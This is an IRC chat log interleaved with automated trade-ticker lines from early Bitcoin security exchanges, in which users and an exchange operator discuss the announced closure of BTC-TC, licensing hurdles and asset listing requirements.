[BTCTC] [LABCOIN] 400 @ 0.001099 = 0.4396 BTC [+] Sep 23 11:31:13 [BTCTC] [TAT.NEOBEE] 165 @ 0.0026 = 0.429 BTC [-] Sep 23 11:31:14 [BTCTC] [TAT.ASICMINER] 11 @ 0.01232 = 0.1355 BTC [+] Sep 23 11:32:24 Ukyo you need to buy more servers .) Sep 23 11:32:30 usagi: without rumors.. what will they post on the forums? :( Sep 23 11:32:41 sdfsdfs: I have major major hardware and network upgrade plans set for nov Sep 23 11:32:48 once we have our license Sep 23 11:33:16 [BTCTC] [B] [CIPHERMINE.B1] 100 @ 0.01027 = 1.027 BTC [-] Sep 23 11:33:16 [BTCTC] [ACTIVEMINING] 3826 @ 0.00102 = 3.9025 BTC [-] Sep 23 11:33:50 Ukyo: How far along is your API? I was working on a desktop-client for BTCT using its API and now I have a half-finished project :( Sep 23 11:34:17 [BTCTC] [ASICMINER-PT] 1 @ 1.22 BTC [+] Sep 23 11:34:17 [HAVELOCK] [LABCO] 35 @ 0.00304998 = 0.1067 BTC [-] Sep 23 11:34:19 Rannasha: we have apps. Sep 23 11:34:21 :P Sep 23 11:34:33 honestly Sep 23 11:34:38 BF has a _lost_ ready to go Sep 23 11:34:46 but waiting for license before doing anything more that is major Sep 23 11:35:01 Alright Sep 23 11:35:03 any eta? :) Sep 23 11:35:23 I am expecting to meet with ministers mid/end Oct Sep 23 11:35:27 and will hopefully have an answer Sep 23 11:35:42 are you uk based? Sep 23 11:35:51 personally? nah Sep 23 11:35:53 I'm in texas Sep 23 11:35:58 I hear pirate is like 1hr away from me :P Sep 23 11:36:19 [BTCTC] [LABCOIN] 2256 @ 0.001099 = 2.4793 BTC [+] Sep 23 11:42:25 [BTCTC] [TAT.NEOBEE] 500 @ 0.0026 = 1.3 BTC [-] Sep 23 11:43:12 btct is dead for me Sep 23 11:43:19 (site loading wise) anyone else? Sep 23 11:43:22 yup Sep 23 11:43:26 [BTCTC] [TAT.ASICMINER] 14 @ 0.0123 = 0.1722 BTC [-] Sep 23 11:43:27 trading api down, too Sep 23 11:43:48 its back Sep 23 11:44:40 still down for me Sep 23 11:46:45 usagi called it hours before the annoucement. I should have listened to him Sep 23 11:47:49 CIPHERMINE-PT shareholders please read: https://bitcointalk.org/index.php?topic=283947.msg3215405#msg3215405 Sep 23 11:47:55 he did? Sep 23 11:48:36 https://bitcointalk.org/index.php?topic=125629.msg3214440#msg3214440 Sep 23 11:48:42 [BTC-TC] Virtual Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Sep 23 11:49:19 "BMF reminds it's investors that it is not liable for losses caused by the closure of an exchange... :/" roflol Sep 23 11:49:26 nice usagi :P Sep 23 11:50:33 [BTCTC] [LABCOIN] 2656 @ 0.0011 = 2.9216 BTC [+] Sep 23 11:50:33 [BTCTC] [BTC-TRADING-PT] 25 @ 0.01 = 0.25 BTC [-] Sep 23 11:51:05 I think mp called it quite some time ago Sep 23 11:51:49 I wonder if BF will have to shut down Sep 23 11:51:51 well there is a bet on bitbet Sep 23 11:51:55 still time to join Sep 23 11:52:05 shhht Sep 23 11:52:08 it does say or before itshuts down right? Sep 23 11:52:13 not at announcement time? Sep 23 11:52:13 ;P Sep 23 11:54:40 ukyo is bitfunder your fulltime job? Sep 23 11:55:38 [BTCTC] [ASICMINER-PT] 1 @ 1.281 BTC [+] Sep 23 11:56:09 sdfsdfs: weexchange and bitfunder Sep 23 11:56:23 nice Sep 23 11:56:25 i am hoping to have a first money transmitter license for weex soon Sep 23 11:56:34 and working to get a license for BF at the same time Sep 23 11:56:39 where did you get the money Sep 23 11:56:44 for all the legal work Sep 23 11:56:50 mostly out of pocket Sep 23 11:57:05 have spent close to 4x the the total profit of BF so far on lawyer fees Sep 23 11:58:22 so you had a fulltime job before? Sep 23 11:58:29 and quit because of bf? Sep 23 11:58:41 [BTCTC] [LABCOIN] 2838 @ 0.00109512 = 3.108 BTC [-] {2} Sep 23 11:58:41 no Sep 23 11:58:51 i havent technically had a fulltime job in some 12 years :P Sep 23 11:59:04 I started, fully owned and operated my own datacenter for abotu 8 years Sep 23 11:59:27 grew into a 2500sqf and up to 7,000 sqft datacenter in Dallas Sep 23 11:59:42 [BTCTC] [ASICMINER-PT] 2 @ 1.268 = 2.536 BTC [-] Sep 23 11:59:57 wait LTC is direct to bitfunder? Sep 23 12:00:06 what LTC ? Sep 23 12:00:11 :P Sep 23 12:00:34 somethin icebreaker mentioned in a thread, just trollin? Sep 23 12:00:43 [BTCTC] [ASICMINER-PT] 2 @ 1.233 = 2.466 BTC [-] {2} Sep 23 12:01:00 nah, hes right Sep 23 12:01:08 ah Sep 23 12:01:08 you deposit 'whole' ltc, no decimals Sep 23 12:01:19 each one becomes 1 share of CRYPTO.LTC Sep 23 12:01:44 [BTCTC] [DMS.MINING] 232 @ 0.001401 = 0.325 BTC [-] Sep 23 12:02:08 i see Sep 23 12:02:24 what about ltc based assets Sep 23 12:02:45 [BTCTC] [LABCOIN] 2700 @ 0.001024 = 2.7648 BTC [-] {2} Sep 23 12:02:45 [BTCTC] [ASICMINER-PT] 1 @ 1.466 BTC [+] Sep 23 12:02:45 [BTCTC] [TAT.ASICMINER] 66 @ 0.0123 = 0.8118 BTC [-] Sep 23 12:03:42 damnit Sep 23 12:03:46 [BTCTC] [LABCOIN] 3252 @ 0.001024 = 3.33 BTC [-] Sep 23 12:03:46 [BTCTC] [ACTIVEMINING] 105 @ 0.001102 = 0.1157 BTC [+] Sep 23 12:03:51 mp was right Sep 23 12:03:53 i hate that Sep 23 12:05:02 at least burnside provided all issuers with a shareholders list. still he is a fucking scammer Sep 23 12:05:37 he lives in the US operating an unlicensed securities exchange, this was going to happen Sep 23 12:05:47 i didn't expect so soon Sep 23 12:05:49 wow https://bitcointalk.org/index.php?topic=125629.msg3215423#msg3215423 Sep 23 12:05:53 i think he's mad bro. Sep 23 12:06:13 he is right Sep 23 12:06:31 to be very clear Sep 23 12:06:36 I am not happy about this at all Sep 23 12:06:49 a. BF will be loosing a lot of arb trade Sep 23 12:06:53 you should be Sep 23 12:06:59 lol arb Sep 23 12:07:09 b. Burnside has now done a great job scaring all the investors/users shitless of any exchanges Sep 23 12:07:09 you will get a lot of new assets Sep 23 12:07:15 this is a critical moment for you ukyo, step up to take over the entire market Sep 23 12:07:16 and tripple your AM sahres Sep 23 12:07:37 sdfsdfs: i dont think most assets on btct will pass requirements Sep 23 12:07:48 lol Sep 23 12:07:55 is cog still operated by a miner? Sep 23 12:07:55 :P Sep 23 12:07:59 or is he legal now? Sep 23 12:08:20 a minor miner no less Sep 23 12:08:27 think he is 18 now Sep 23 12:08:32 at least he is at college Sep 23 12:09:21 I am mostly intrigued by what Deprived will end up doing Sep 23 12:09:37 and, tat is still asleep Sep 23 12:09:44 hes gonna wake up to massive msgs Sep 23 12:10:07 Burnsides timing could be better too, I think he went to bed shortly after posting the announcement Sep 23 12:10:18 he should set up an exchange outside the us and not accepting us customers Sep 23 12:10:35 forums say hes online Sep 23 12:10:54 i would be surprised if he cold get any sleep right now even if he wanted to Sep 23 12:10:58 us gov fucks up everything Sep 23 12:11:06 us gov? Sep 23 12:11:19 us poker, megaupload, bitcoin Sep 23 12:11:24 what if it was belize gov? Sep 23 12:11:27 where btct was registered Sep 23 12:11:42 but i agree Sep 23 12:11:48 regardless, the us gov is annoying on many fronts ^^ Sep 23 12:11:49 i forsee most btc sites banning us ips Sep 23 12:12:06 if I dont get BF's license. and possibly even still Sep 23 12:12:09 as i have said before Sep 23 12:12:10 it is always the us gov that is why so many people dont like america Sep 23 12:12:13 bf may have to give notice to us users Sep 23 12:12:22 but if we have to, HL will too Sep 23 12:12:39 i hope so Sep 23 12:12:45 easy to use a vpn Sep 23 12:12:49 for us users Sep 23 12:13:28 or register as a cheap $50 corp in london ;) Sep 23 12:14:04 https://bitcointalk.org/index.php?topic=125629.msg3215540#msg3215540 <-- see, hes awake Sep 23 12:14:10 [BTC-TC] Virtual Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Sep 23 12:14:26 Ukyo do you see any problems in possibly listing Labcoin on Bitfunder? Sep 23 12:14:41 ah right, he posted that he'd answer more questions "tomorrow", but I guess he ended up not going to sleep just yet. Sep 23 12:14:43 i see potentnial problems in most all assets :P Sep 23 12:14:45 you're the next logical choice for the operator Sep 23 12:14:52 even some on bf which I have been working on Sep 23 12:14:58 [BTCTC] [DMS.MINING] 198 @ 0.001404 = 0.278 BTC [+] Sep 23 12:15:16 ukyo but you belive in labcoin? apperently you are a shareholder Sep 23 12:15:16 Duffer1: keep in mind, labcoin probably wont even know about btct for a week, based on their communications ability :P Sep 23 12:15:17 I think Labcoin is going to have problems listing whereever they try, with all their terrible communication and broken promises Sep 23 12:15:27 ha good point Sep 23 12:15:34 sdfsdfs: touch call Sep 23 12:15:36 tough call Sep 23 12:15:42 this puts me in a position i did not want Sep 23 12:15:49 i may have to ask them to proove things to me Sep 23 12:15:55 which puts me in a bad position vs normal shareholders Sep 23 12:15:56 please do Sep 23 12:15:59 [BTCTC] [LABCOIN] 2002 @ 0.001025 = 2.0521 BTC [+] Sep 23 12:16:15 man you could put the screws to them and get some answers shareholders have been demanding for aLONG time Sep 23 12:16:26 I refuse to trade on/with assets that I have any additional knowledge of unless all users are aware of it Sep 23 12:16:28 such as AM board Sep 23 12:16:29 etc Sep 23 12:16:35 and even AM doesnt give any info out Sep 23 12:17:00 [BTCTC] [LABCOIN] 620 @ 0.001024 = 0.6349 BTC [-] Sep 23 12:17:00 [BTCTC] [TAT.ASICMINER] 476 @ 0.0123 = 5.8548 BTC [-] Sep 23 12:17:23 get them to show you a vid of their setup, with IDs of the principles Sep 23 12:17:30 well Sep 23 12:17:32 to list on bf Sep 23 12:17:40 we require business documentation and peronal ID Sep 23 12:17:48 er personal Sep 23 12:17:52 of all actual owners Sep 23 12:18:01 [BTCTC] [ACTIVEMINING] 5403 @ 0.00110015 = 5.9441 BTC [-] {3} Sep 23 12:18:01 [BTCTC] [FN] [DMS.SELLING] 749 @ 0.00690039 = 5.1684 BTC [-] {3} Sep 23 12:18:12 i agree that issuers need to fully scrutinzed and investigated Sep 23 12:18:19 i think users should be free to be anonymous as they want tho Sep 23 12:18:49 ooh Sep 23 12:18:52 https://bitcointalk.org/index.php?topic=125629.msg3215586#msg3215586 <-- good point Sep 23 12:18:55 [BTC-TC] Virtual Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Sep 23 12:19:02 [BTCTC] [TAT.ASICMINER] 60 @ 0.0123 = 0.738 BTC [-] Sep 23 12:19:06 what's the issue with direct BTC integration with BF? legal reasons? Sep 23 12:19:31 Duffer1: actually it has helped quite a bit for legal reasons Sep 23 12:19:33 lol why is the COGNITIV share price higher than before the closure Sep 23 12:19:46 i also dont want to maintain and operate 2 wallets Sep 23 12:19:57 also, user security stuffs Sep 23 12:20:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.01232 = 0.1232 BTC [+] Sep 23 12:20:03 [BTCTC] [LABCOIN] 5000 @ 0.0011 = 5.5 BTC [+] Sep 23 12:20:04 [BTCTC] [TAT.NEOBEE] 400 @ 0.0029 = 1.16 BTC [+] Sep 23 12:21:04 [BTCTC] [LABCOIN] 1514 @ 0.001026 = 1.5534 BTC [-] Sep 23 12:21:04 [BTCTC] [TAT.ASICMINER] 90 @ 0.0123 = 1.107 BTC [-] Sep 23 12:22:05 [BTCTC] [LABCOIN] 8086 @ 0.001026 = 8.2962 BTC [-] {2} Sep 23 12:22:05 [BTCTC] [ACTIVEMINING] 230 @ 0.001103 = 0.2537 BTC [+] Sep 23 12:23:06 [BTCTC] [ASICMINER-PT] 2 @ 1.459 = 2.918 BTC [-] Sep 23 12:24:07 [BTCTC] [ASICMINER-PT] 2 @ 1.46 = 2.92 BTC [+] Sep 23 12:24:07 [BTCTC] [LABCOIN] 5512 @ 0.00105 = 5.7876 BTC [+] Sep 23 12:26:08 [BTCTC] [ACTIVEMINING] 438 @ 0.00110002 = 0.4818 BTC [-] {2} Sep 23 12:26:08 [BTCTC] [LABCOIN] 6488 @ 0.00105 = 6.8124 BTC [+] Sep 23 12:26:08 [BTCTC] [B] [CIPHERMINE.B1] 2000 @ 0.0099 = 19.8 BTC [-] Sep 23 12:26:09 [BTCTC] [ASICMINER-PT] 2 @ 1.462 = 2.924 BTC [+] Sep 23 12:27:09 [BTCTC] [ASICMINER-PT] 1 @ 1.463 BTC [+] Sep 23 12:27:09 [BTCTC] [ACTIVEMINING] 5000 @ 0.001095 = 5.475 BTC [-] Sep 23 12:28:10 [BTCTC] [LABCOIN] 1251 @ 0.001101 = 1.3774 BTC [+] Sep 23 12:28:10 [BTCTC] [ASICMINER-PT] 1 @ 1.463 BTC [+] Sep 23 12:29:11 [BTCTC] [ASICMINER-PT] 1 @ 1.465 BTC [+] Sep 23 12:29:11 [BTCTC] [ACTIVEMINING] 4000 @ 0.00109 = 4.36 BTC [-] Sep 23 12:30:12 [BTCTC] [TAT.NEOBEE] 2900 @ 0.0028 = 8.12 BTC [-] Sep 23 12:30:12 [BTCTC] [DMS.MINING] 999 @ 0.0015 = 1.4985 BTC [+] Sep 23 12:30:13 [BTCTC] [ASICMINER-PT] 4 @ 1.466 = 5.864 BTC [+] Sep 23 12:30:14 [BTCTC] [LABCOIN] 1000 @ 0.00112 = 1.12 BTC [+] Sep 23 12:31:13 [BTCTC] [ASICMINER-PT] 1 @ 1.467 BTC [+] Sep 23 12:31:13 [BTCTC] [DMS.MINING] 384 @ 0.0015 = 0.576 BTC [+] Sep 23 12:33:15 [BTCTC] [KENILWORTH] 961 @ 0.0012 = 1.1532 BTC [-] Sep 23 12:33:15 [BTCTC] [ASICMINER-PT] 1 @ 1.46 BTC [-] Sep 23 12:33:16 [BTCTC] [DMS.MINING] 1999 @ 0.0015 = 2.9985 BTC [+] Sep 23 12:34:16 [BTCTC] [ASICMINER-PT] 1 @ 1.466 BTC [+] Sep 23 12:34:16 [BTCTC] [LABCOIN] 400 @ 0.00125 = 0.5 BTC [-] Sep 23 12:35:17 [BTCTC] [ACTIVEMINING] 313 @ 0.001089 = 0.3409 BTC [+] {2} Sep 23 12:35:17 [BTCTC] [ASICMINER-PT] 1 @ 1.467 BTC [+] Sep 23 12:35:18 [MPEX] [S.MPOE] 4474 @ 0.00092615 = 4.1436 BTC [+] Sep 23 12:36:18 [BTCTC] [ASICMINER-PT] 1 @ 1.467 BTC [+] Sep 23 12:36:18 [BTCTC] [ACTIVEMINING] 313 @ 0.00109 = 0.3412 BTC [+] Sep 23 12:37:19 [HAVELOCK] [VTX] 6 @ 0.50000335 = 3 BTC [-] {3} Sep 23 12:37:20 [MPEX] [S.MPOE] 7026 @ 0.00092615 = 6.5071 BTC [+] Sep 23 12:37:21 [HAVELOCK] [HIM] 10 @ 0.17 = 1.7 BTC [-] {2} Sep 23 12:37:22 [BTCTC] [ASICMINER-PT] 2 @ 1.474 = 2.948 BTC [+] Sep 23 12:38:20 [BTCTC] [ASICMINER-PT] 3 @ 1.474 = 4.422 BTC [+] Sep 23 12:38:21 [BTCTC] [LABCOIN] 5904 @ 0.00149893 = 8.8497 BTC [+] {2} Sep 23 12:39:21 [HAVELOCK] [AM100] 100 @ 0.01615283 = 1.6153 BTC [-] {15} Sep 23 12:39:23 [BTCTC] [ASICMINER-PT] 1 @ 1.46 BTC [-] Sep 23 12:39:23 [BTCTC] [LABCOIN] 5512 @ 0.0015 = 8.268 BTC [+] Sep 23 12:40:22 [BTCTC] [ASICMINER-PT] 15 @ 1.45279999 = 21.792 BTC [-] {5} Sep 23 12:40:23 [BTCTC] [LABCOIN] 6001 @ 0.00155453 = 9.3287 BTC [+] {5} Sep 23 12:41:23 [BTCTC] [ASICMINER-PT] 114 @ 1.28012275 = 145.934 BTC [-] {22} Sep 23 12:41:24 [BTCTC] [TAT.ASICMINER] 25 @ 0.01203999 = 0.301 BTC [-] {4} Sep 23 12:41:24 [BTCTC] [FN] [BTC-GROWTH] 8 @ 0.03601 = 0.2881 BTC [-] Sep 23 12:42:25 [BTCTC] [ASICMINER-PT] 59 @ 1.21979658 = 71.968 BTC [-] {16} Sep 23 12:42:25 [BTCTC] [TAT.ASICMINER] 27 @ 0.01193666 = 0.3223 BTC [-] {2} Sep 23 12:43:26 [BTCTC] [DMS.MINING] 168 @ 0.0015 = 0.252 BTC [+] Sep 23 12:43:26 [BTCTC] [LABCOIN] 12801 @ 0.0013194 = 16.8896 BTC [-] {6} Sep 23 12:43:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.012 = 0.12 BTC [+] Sep 23 12:44:27 [BTCTC] [LABCOIN] 35585 @ 0.00119624 = 42.5682 BTC [-] {11} Sep 23 12:45:28 [BTCTC] [LABCOIN] 63967 @ 0.00105832 = 67.6976 BTC [-] {12} Sep 23 12:46:29 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [+] Sep 23 12:46:29 [BTCTC] [TAT.NEOBEE] 360 @ 0.00264166 = 0.951 BTC [-] {2} Sep 23 12:46:29 [BTCTC] [LABCOIN] 32254 @ 0.00127604 = 41.1574 BTC [+] {9} Sep 23 12:47:30 [BTCTC] [LABCOIN] 449 @ 0.001252 = 0.5621 BTC [-] {2} Sep 23 12:47:39 i thought paying a team of lawyers big bickies to tell you that you're breaking the law would come to be known as a neobee, i guess it's a burnside now Sep 23 12:48:31 [BTCTC] [LABCOIN] 1201 @ 0.0013108 = 1.5743 BTC [+] {3} Sep 23 12:48:31 [BTCTC] [FN] [BTC-GROWTH] 25 @ 0.041 = 1.025 BTC [+] Sep 23 12:48:31 [BTCTC] [ASICMINER-PT] 2 @ 1.319 = 2.638 BTC [+] Sep 23 12:49:32 [BTCTC] [LTC-ATF.B2] 99 @ 0.01 = 0.99 BTC [-] Sep 23 12:49:32 [BTCTC] [ASICMINER-PT] 5 @ 1.31919999 = 6.596 BTC [+] {4} Sep 23 12:50:32 [MPEX] [S.MPOE] 8024 @ 0.00092427 = 7.4163 BTC [-] {2} Sep 23 12:50:32 [BTCTC] [ASICMINER-PT] 3 @ 1.319 = 3.957 BTC [-] {2} Sep 23 12:50:33 [BTCTC] [LABCOIN] 4914 @ 0.0012106 = 5.9489 BTC [-] {3} Sep 23 12:51:33 [BTCTC] [ASICMINER-PT] 2 @ 1.29 = 2.58 BTC [-] {2} Sep 23 12:51:33 [BTCTC] [LABCOIN] 3000 @ 0.001212 = 3.636 BTC [+] Sep 23 12:52:34 [BTCTC] [LABCOIN] 200 @ 0.001281 = 0.2562 BTC [+] Sep 23 12:53:35 [BTCTC] [LABCOIN] 3000 @ 0.001222 = 3.666 BTC [-] Sep 23 12:53:35 [BTCTC] [ASICMINER-PT] 5 @ 1.251 = 6.255 BTC [-] {2} Sep 23 12:54:25 better call saul Sep 23 12:54:36 [BTCTC] [LABCOIN] 8597 @ 0.00122264 = 10.511 BTC [+] {7} Sep 23 12:54:37 [BTCTC] [TAT.ASICMINER] 59 @ 0.01195 = 0.7051 BTC [-] {2} Sep 23 12:54:37 [BTCTC] [ASICMINER-PT] 1 @ 3.2 BTC [+] Sep 23 12:54:37 [BTCTC] [ACTIVEMINING] 221 @ 0.00111519 = 0.2465 BTC [+] {2} Sep 23 12:55:37 [BTCTC] [TAT.ASICMINER] 102 @ 0.01180724 = 1.2043 BTC [-] {3} Sep 23 12:55:37 [BTCTC] [ASICMINER-PT] 2 @ 1.36 = 2.72 BTC [-] Sep 23 12:55:37 [BTCTC] [TAT.NEOBEE] 1000 @ 0.0027 = 2.7 BTC [+] Sep 23 12:56:38 [BTCTC] [LABCOIN] 2912 @ 0.00124323 = 3.6203 BTC [+] {2} Sep 23 12:56:39 [BTCTC] [TAT.ASICMINER] 39 @ 0.01138 = 0.4438 BTC [-] Sep 23 12:56:39 [BTCTC] [ASICMINER-PT] 2 @ 3.2 = 6.4 BTC [+] Sep 23 12:57:39 [BTCTC] [LABCOIN] 11200 @ 0.00121402 = 13.597 BTC [-] {6} Sep 23 12:57:40 [BTCTC] [ASICMINER-PT] 2 @ 1.359 = 2.718 BTC [-] Sep 23 12:57:40 [BTCTC] [TAT.ASICMINER] 64 @ 0.01192 = 0.7629 BTC [+] Sep 23 12:58:40 [BTCTC] [LABCOIN] 200 @ 0.001212 = 0.2424 BTC [-] Sep 23 12:58:41 [BTCTC] [ASICMINER-PT] 2 @ 3.2 = 6.4 BTC [+] Sep 23 12:58:41 [BTCTC] [TAT.NEOBEE] 500 @ 0.002601 = 1.3005 BTC [-] Sep 23 12:59:42 [BTCTC] [LABCOIN] 3000 @ 0.001216 = 3.648 BTC [+] Sep 23 13:00:43 [BTCTC] [TAT.ASICMINER] 20 @ 0.011945 = 0.2389 BTC [+] {2} Sep 23 13:01:44 [BTCTC] [LABCOIN] 500 @ 0.001279 = 0.6395 BTC [+] Sep 23 13:01:44 [BTCTC] [BASIC-MINING] 5 @ 0.0999 = 0.4995 BTC [+] Sep 23 13:02:45 [BTCTC] [LABCOIN] 11545 @ 0.00129136 = 14.9088 BTC [+] {10} Sep 23 13:02:45 [BTCTC] [FN] [DMS.SELLING] 126 @ 0.00450793 = 0.568 BTC [-] {2} Sep 23 13:02:45 [BTCTC] [TAT.ASICMINER] 22 @ 0.01386 = 0.3049 BTC [+] Sep 23 13:04:47 [BTCTC] [ACTIVEMINING] 300 @ 0.00135 = 0.405 BTC [+] Sep 23 13:06:49 [BTCTC] [ASICMINER-PT] 6 @ 1.31183333 = 7.871 BTC [-] {3} Sep 23 13:07:51 [BTCTC] [LABCOIN] 2820 @ 0.00125678 = 3.5441 BTC [-] {4} Sep 23 13:07:51 [BTCTC] [ASICMINER-PT] 2 @ 1.316 = 2.632 BTC [+] {2} Sep 23 13:08:51 [BTCTC] [LABCOIN] 100 @ 0.001442 = 0.1442 BTC [+] Sep 23 13:08:51 [BTCTC] [ASICMINER-PT] 20 @ 1.27924999 = 25.585 BTC [-] {7} Sep 23 13:08:51 [BTCTC] [TAT.ASICMINER] 67 @ 0.01210447 = 0.811 BTC [-] {2} Sep 23 13:09:52 [BTCTC] [NASTY-PT] 785 @ 0.0004798 = 0.3766 BTC [-] Sep 23 13:09:52 [BTCTC] [ACTIVEMINING] 191 @ 0.00113196 = 0.2162 BTC [+] {2} Sep 23 13:10:53 [BTCTC] [ACTIVEMINING] 124 @ 0.001132 = 0.1404 BTC [+] {2} Sep 23 13:12:55 [BTCTC] [ASICMINER-PT] 4 @ 1.29 = 5.16 BTC [+] Sep 23 13:12:55 [BTCTC] [LABCOIN] 1800 @ 0.00125822 = 2.2648 BTC [+] {2} Sep 23 13:13:56 [BTCTC] [LABCOIN] 203 @ 0.00125763 = 0.2553 BTC [-] {2} Sep 23 13:13:56 [BTCTC] [ASICMINER-PT] 1 @ 1.282 BTC [-] Sep 23 13:13:56 [BTCTC] [TAT.ASICMINER] 49 @ 0.01371 = 0.6718 BTC [+] Sep 23 13:14:57 [BTCTC] [LABCOIN] 955 @ 0.00127041 = 1.2132 BTC [+] {2} Sep 23 13:14:57 [BTCTC] [ASICMINER-PT] 1 @ 1.271 BTC [-] Sep 23 13:16:59 [HAVELOCK] [CBTC] 1153 @ 0.00039965 = 0.4608 BTC [+] {2} Sep 23 13:19:01 [BTCTC] [LABCOIN] 142 @ 0.001372 = 0.1948 BTC [+] Sep 23 13:20:02 [BTCTC] [ACTIVEMINING] 1000 @ 0.00111923 = 1.1192 BTC [-] {8} Sep 23 13:22:04 [BTCTC] [ASICMINER-PT] 2 @ 1.2635 = 2.527 BTC [-] {2} Sep 23 13:24:06 [HAVELOCK] [AM1] 1 @ 1.74999999 BTC [+] Sep 23 13:25:07 [BTCTC] [LABCOIN] 5000 @ 0.00127682 = 6.3841 BTC [-] {4} Sep 23 13:25:08 [BTCTC] [ASICMINER-PT] 3 @ 1.263 = 3.789 BTC [-] {2} Sep 23 13:26:07 [BTCTC] [ASICMINER-PT] 3 @ 1.264 = 3.792 BTC [+] {3} Sep 23 13:26:08 [BTCTC] [TAT.ASICMINER] 49 @ 0.0124 = 0.6076 BTC [+] Sep 23 13:27:08 [BTCTC] [FN] [BTC-GROWTH] 30 @ 0.04601 = 1.3803 BTC [+] Sep 23 13:29:10 [BTCTC] [ACTIVEMINING] 36978 @ 0.00101889 = 37.6765 BTC [-] {18} Sep 23 13:29:11 [BTCTC] [BTC-TRADING-PT] 3 @ 0.34 = 1.02 BTC [+] Sep 23 13:29:11 [BTCTC] [LABCOIN] 1670 @ 0.001282 = 2.1409 BTC [+] Sep 23 13:29:11 [BTCTC] [ASICMINER-PT] 7 @ 1.349 = 9.443 BTC [+] {2} Sep 23 13:30:12 [BTCTC] [LABCOIN] 1830 @ 0.0012822 = 2.3464 BTC [+] {2} Sep 23 13:30:12 [BTCTC] [ASICMINER-PT] 3 @ 1.349 = 4.047 BTC [+] Sep 23 13:31:13 [BTCTC] [ASICMINER-PT] 6 @ 1.35 = 8.1 BTC [+] Sep 23 13:31:13 [BTCTC] [LABCOIN] 18950 @ 0.00127937 = 24.2441 BTC [-] {10} Sep 23 13:32:14 [HAVELOCK] [CBTC] 6000 @ 0.00039967 = 2.398 BTC [+] Sep 23 13:32:15 [BTCTC] [LABCOIN] 8986 @ 0.00126508 = 11.368 BTC [-] {3} Sep 23 13:32:15 [BTCTC] [ASICMINER-PT] 9 @ 1.35777777 = 12.22 BTC [+] {2} Sep 23 13:33:15 [BTCTC] [LABCOIN] 20370 @ 0.00123583 = 25.1739 BTC [-] {7} Sep 23 13:33:15 [BTCTC] [ASICMINER-PT] 1 @ 1.347 BTC [-] Sep 23 13:33:15 [BTCTC] [FIMB] 500 @ 0.00989964 = 4.9498 BTC [-] {2} Sep 23 13:35:17 [BTCTC] [B] [CIPHERMINE.B1] 1300 @ 0.01 = 13 BTC [+] Sep 23 13:35:17 [BTCTC] [LABCOIN] 4500 @ 0.0012159 = 5.4716 BTC [-] {4} Sep 23 13:36:18 [BTCTC] [LABCOIN] 1311 @ 0.0013593 = 1.782 BTC [+] {5} Sep 23 13:37:19 [BTCTC] [LABCOIN] 487 @ 0.001378 = 0.6711 BTC [+] Sep 23 13:37:19 [BTCTC] [DMS.MINING] 790 @ 0.001661 = 1.3122 BTC [+] {2} Sep 23 13:38:20 [BTCTC] [FIMB] 2 @ 0.1 = 0.2 BTC [+] Sep 23 13:40:22 [BTCTC] [ASICMINER-PT] 1 @ 1.385 BTC [+] Sep 23 13:40:23 [BTCTC] [TAT.NEOBEE] 700 @ 0.0027 = 1.89 BTC [+] Sep 23 13:41:23 [BTCTC] [ASICMINER-PT] 1 @ 1.39 BTC [+] Sep 23 13:41:23 [BTCTC] [NASTY-PT] 280 @ 0.001 = 0.28 BTC [+] Sep 23 13:41:23 [BTCTC] [ACTIVEMINING] 2266 @ 0.00110013 = 2.4929 BTC [-] {2} Sep 23 13:41:24 [BTCTC] [LABCOIN] 320 @ 0.001225 = 0.392 BTC [-] Sep 23 13:41:25 [BTCTC] [COGNITIVE] 3 @ 0.06101 = 0.183 BTC [-] Sep 23 13:42:24 [BTCTC] [LABCOIN] 28136 @ 0.00121769 = 34.2609 BTC [-] {24} Sep 23 13:42:24 [BTCTC] [TAT.ASICMINER] 55 @ 0.01267471 = 0.6971 BTC [-] {7} Sep 23 13:42:24 [BTCTC] [BASIC-MINING] 3 @ 0.0965 = 0.2895 BTC [+] Sep 23 13:42:24 [BTCTC] [ASICMINER-PT] 4 @ 1.34 = 5.36 BTC [-] Sep 23 13:43:25 [BTCTC] [LABCOIN] 7192 @ 0.00121178 = 8.7151 BTC [-] {6} Sep 23 13:43:25 [BTCTC] [ASICMINER-PT] 1 @ 1.3 BTC [-] Sep 23 13:44:26 [BTCTC] [LABCOIN] 11540 @ 0.00120452 = 13.9002 BTC [-] {10} Sep 23 13:44:26 [BTCTC] [ASICMINER-PT] 1 @ 1.389 BTC [+] Sep 23 13:45:27 [BTCTC] [TAT.ASICMINER] 298 @ 0.01334136 = 3.9757 BTC [+] {8} Sep 23 13:45:27 [BTCTC] [ACTIVEMINING] 1540 @ 0.00119569 = 1.8414 BTC [+] {8} Sep 23 13:47:29 [BTCTC] [TAT.ASICMINER] 73 @ 0.0123489 = 0.9015 BTC [-] {6} Sep 23 13:47:29 [BTCTC] [LABCOIN] 7435 @ 0.00113971 = 8.4737 BTC [-] {4} Sep 23 13:47:29 [BTCTC] [ASICMINER-PT] 10 @ 1.28359999 = 12.836 BTC [-] {5} Sep 23 13:48:30 [BTCTC] [LABCOIN] 1487 @ 0.00116585 = 1.7336 BTC [+] {3} Sep 23 13:48:30 [BTCTC] [TAT.ASICMINER] 199 @ 0.01236 = 2.4596 BTC [+] Sep 23 13:48:30 [BTCTC] [BTC-TRADING-PT] 20 @ 0.05 = 1 BTC [-] Sep 23 13:49:31 [BTCTC] [LABCOIN] 2568 @ 0.00117504 = 3.0175 BTC [+] {3} Sep 23 13:49:31 [BTCTC] [B] [CIPHERMINE.B1] 100 @ 0.01 = 1 BTC [+] Sep 23 13:49:31 [BTCTC] [BTC-TRADING-PT] 35 @ 0.02371428 = 0.83 BTC [-] {2} Sep 23 13:49:31 [BTCTC] [TAT.NEOBEE] 200 @ 0.00271 = 0.542 BTC [+] Sep 23 13:49:46 https://aaanditsgone.com Sep 23 13:50:32 [BTCTC] [BASIC-MINING] 3 @ 0.0631 = 0.1893 BTC [+] Sep 23 13:50:32 [BTCTC] [LABCOIN] 1000 @ 0.0011395 = 1.1395 BTC [-] {2} Sep 23 13:50:32 [BTCTC] [ACTIVEMINING] 602 @ 0.00125037 = 0.7527 BTC [+] {2} Sep 23 13:51:33 [BTCTC] [LABCOIN] 3963 @ 0.00114 = 4.5178 BTC [+] {2} Sep 23 13:52:34 [BTCTC] [B] [CIPHERMINE.B1] 1200 @ 